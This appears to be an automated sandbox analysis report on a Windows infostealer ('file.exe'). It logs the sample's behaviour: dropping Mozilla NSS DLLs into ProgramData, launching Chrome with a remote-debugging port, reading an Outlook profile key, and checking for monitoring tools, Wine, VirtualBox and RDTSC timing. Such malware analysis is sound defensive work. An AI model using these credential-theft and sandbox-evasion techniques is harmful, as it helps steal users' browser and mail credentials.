Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C524640 0_2_6C524640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C552E4E 0_2_6C552E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50C670 0_2_6C50C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C576E63 0_2_6C576E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C547E10 0_2_6C547E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C555600 0_2_6C555600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C569E30 0_2_6C569E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50BEF0 0_2_6C50BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51FEF0 0_2_6C51FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5776E3 0_2_6C5776E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C525E90 0_2_6C525E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56E680 0_2_6C56E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C564EA0 0_2_6C564EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C547710 0_2_6C547710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C519F00 0_2_6C519F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C536FF0 0_2_6C536FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50DFE0 0_2_6C50DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5577A0 0_2_6C5577A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C528850 0_2_6C528850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52D850 0_2_6C52D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54F070 0_2_6C54F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C517810 0_2_6C517810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54B820 0_2_6C54B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C554820 0_2_6C554820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5750C7 0_2_6C5750C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52C0E0 0_2_6C52C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5458E0 0_2_6C5458E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5360A0 0_2_6C5360A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52A940 0_2_6C52A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55B970 0_2_6C55B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57B170 0_2_6C57B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51D960 0_2_6C51D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C545190 0_2_6C545190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C562990 0_2_6C562990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53D9B0 0_2_6C53D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50C9A0 0_2_6C50C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C549A60 0_2_6C549A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C548AC0 0_2_6C548AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C521AF0 0_2_6C521AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54E2F0 0_2_6C54E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57BA90 0_2_6C57BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51CAB0 0_2_6C51CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C572AB0 0_2_6C572AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5022A0 0_2_6C5022A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C534AA0 0_2_6C534AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C505340 0_2_6C505340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51C370 0_2_6C51C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54D320 0_2_6C54D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5753C8 0_2_6C5753C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50F380 0_2_6C50F380
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C53CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5494D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2100998756.000000006C592000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2101380219.000000006C785000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: twbahnth ZLIB complexity 0.9948631949558174
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/37@6/7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C567030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C567030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SZ9P2WPJ.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chrome.exe, 00000001.00000002.1927344451.00004A30005DF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1932514165.000000001D294000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2100640119.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2095134588.000000001D399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2432,i,10837436430540024699,4376489110652293416,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2432,i,10837436430540024699,4376489110652293416,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 2177024 > 1048576
Source: file.exe Static PE information: Raw size of twbahnth is bigger than: 0x100000 < 0x1a8600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2100928308.000000006C57D000.00000002.00000001.01000000.00000011.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1730489786.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101541267.000000006C801000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp, chrome.dll.0.dr
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1730489786.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101541267.000000006C801000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp, chrome.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2100928308.000000006C57D000.00000002.00000001.01000000.00000011.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.350000.0.unpack :EW;.rsrc :W;.idata :W; :EW;twbahnth:EW;ahateppd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;twbahnth:EW;ahateppd:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C56C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: chrome.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xb0b18
Source: file.exe Static PE information: real checksum: 0x2145ec should be: 0x216610
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: twbahnth
Source: file.exe Static PE information: section name: ahateppd
Source: file.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B536 push ecx; ret 0_2_6C53B549
Source: file.exe Static PE information: section name: twbahnth entropy: 7.9536824312472065
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\chrome.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\chrome.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5655F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5655F0

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEAD5 second address: 7BEB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 jmp 00007FAA34DB19C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FAA34DB19B6h 0x00000016 jmp 00007FAA34DB19C9h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEB15 second address: 7BEB19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEB19 second address: 7BEB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDB83 second address: 7BDB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDFB9 second address: 7BDFC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE272 second address: 7BE27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE27E second address: 7BE284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE3DF second address: 7BE3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAA34ECFF56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C137A second address: 7C1384 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAA34DB19B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1384 second address: 7C138A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C138A second address: 7C138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C14A2 second address: 7C14AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1507 second address: 7C151E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FAA34DB19B6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FAA34DB19BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C151E second address: 7C1522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
